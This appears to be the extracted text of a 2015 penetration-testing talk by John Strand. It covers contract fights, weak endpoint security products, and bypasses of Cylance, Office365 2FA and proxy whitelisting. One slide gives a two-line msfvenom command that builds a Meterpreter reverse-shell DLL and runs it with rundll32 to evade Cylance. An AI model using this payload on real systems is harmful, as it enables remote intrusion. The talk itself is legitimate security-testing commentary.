Copyright © 2015
Everything you wanted to know..
One week in the life
Copyright © 2015
Wow…. 35 min?
Phew… Ok…..
Copyright © 2015
Lawyers… Oh God…
• Constant fights on Indemnification
• Need to have indemnification clause
• They will fight you almost every time
• Need for analogies
• Lets Make a Deal
Copyright © 2015
Advanced Endpoint Security• We are seeing Vision (Hi Dave!!), Cylance, Bit9 (to a
lesser extent), CrowdStrike, etc. on more tests
– Most are train wrecks… Total train wrecks…
• White listing is a thing… Get used to it
• Smaller organizations doing much better
• Larger orgs getting it… Yea, scary…
• Do not base purchases on a companies marketing budget…
Copyright © 2015
Copyright © 2015
Cyfort bypass - DerekLast week
Copyright © 2015
Cylance bypass - JoffYesterday
• Two lines…• # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=y -f dll -o msf.dll
• C:\> rundll32.exe msf.dll, Control_RunDLL
• Yea… That’s pretty much it…• What does this mean?
Copyright © 2015
8
The Need for a Good Password Set
Copyright © 2015
9
YESSS!!!
Copyright © 2015
OWA/Office365 2FA bypass - BeauToday
Copyright © 2015
OWA/Office365 2FA bypass - BeauToday
Copyright © 2015
OWA/Office365 2FA bypass - BeauToday
Copyright © 2015
OWA/Office365 2FA bypass - BeauToday
Copyright © 2015
Customers Watching UsHappens all the time…. Sally
• While we test….
• Changing things on the fly
• VPN setup, test Powershell… First thing the customer takes from us…
Copyright © 2015
Web Proxy Whitelisting BypassYesterday… Brian
Big thanks to @harmj0y!
Copyright © 2015
Thanks!
• John Strand
– @strandjs
– 303-710-1171
– Ed’s new shirt!